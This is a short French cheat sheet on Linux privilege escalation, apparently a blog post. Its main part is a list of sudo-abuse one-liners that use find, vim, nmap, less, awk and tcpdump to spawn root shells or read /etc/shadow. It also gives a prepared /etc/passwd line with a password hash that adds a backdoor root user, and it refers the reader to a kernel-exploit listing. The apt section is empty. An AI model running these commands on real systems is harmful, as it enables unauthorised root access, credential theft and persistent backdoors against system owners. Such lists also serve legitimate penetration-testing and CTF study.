1. Abuser des droits SUDO :
La commande SUDO (Substitute User and Do), permet aux utilisateurs d’exécuter la commande avec les droit root (ou d’autres utilisateurs) en utilisant leurs propres mots de passe au lieu de celui de root ou sans mot de passe selon le paramétrage de sudoers Les règles concernant la prise de décision sur l’octroi d’un accès sont accessibles dans le fichier /etc/sudoers.

Avec la commande Find :
sudo find /etc/passwd -exec /bin/sh \; sudo find /bin -name nano -exec /bin/sh \;
Avec la commande Vim :
sudo vim -c ‘!bash’
Avec la commande Nmap :
sudo nmap –interactive nmap> !sh sh-4.1#
Une autre manière de faire sans –interactive :
echo « os.execute(‘/bin/sh’) » > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse
Avec la commande MAN :
sudo man man
entrez « !sh"
et appuyez sur ENTER
Avec la commande Less/More :
sudo less /etc/hosts sudo less !ls #(execute la commande ls) sudo more /etc/hosts
entrez « !sh"
et appuyez sur ENTER
Avec la commande awk :
sudo awk ‘BEGIN {system(« /bin/sh »)}’
Avec la commande nano :
Ajoutez ceçi à /etc/passwd
pour créer un nouvel utilisateur avec les droits root
sudo nano /etc/passwd touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
Changez d’utilisateur et utilisez le mdp : test
su touhid
Avec la commande apache :
sudo apache2 -f /etc/shadow
Avec la commande apt :
Avec la commande tcpdump :
echo $’id\ncat /etc/shadow’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
2. Exploits Kernels
En fonction de la version du Kernel utilisé, le site https://www.kernel-exploits.com/ recense des exploits kernels pour différentes versions de Linux.
Un commentaire